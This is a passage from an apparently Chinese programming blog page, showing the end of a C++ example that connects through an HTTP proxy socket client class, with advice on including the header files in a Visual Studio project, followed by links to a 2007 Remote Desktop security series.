      Client.ConnectTo("mail.yahoo.com", 25);
      // You now have access to mail.yahoo.com on port 25.
      // If you do not call SetProxySettings, ConnectTo connects
      // to mail.yahoo.com directly (when you have direct access),
      // so always use CHttpProxySocketClient; no extra coding
      // is needed for either case.
  }
  catch (CSocketException * pE)
  {
      pE->ReportError();
  }

Note: I usually don't split my code into separate .h and .cpp files, because reusing it somewhere else then means moving both files around. So I put all the code in the .h file and write a .cpp only when it is required. You need to copy only SocketEx.h, SocketClient.h, and HttpProxySocket.h into your project's directory, and add the line:

#include "HttpProxySocket.h"

after your:

#if !defined(.....

and the rest of the preamble in your Visual Studio-generated file. If you put the include above that line, you will get any number of errors.
Remote Desktop security explained in full (part 2)
叶子, Sun, 06 May 2007 08:36:00 GMT. http://www.shnenglu.com/elva/archive/2007/05/06/23524.html

Remote Desktop security explained in full (part 1)
叶子, Sun, 06 May 2007 08:35:00 GMT. http://www.shnenglu.com/elva/archive/2007/05/06/23523.html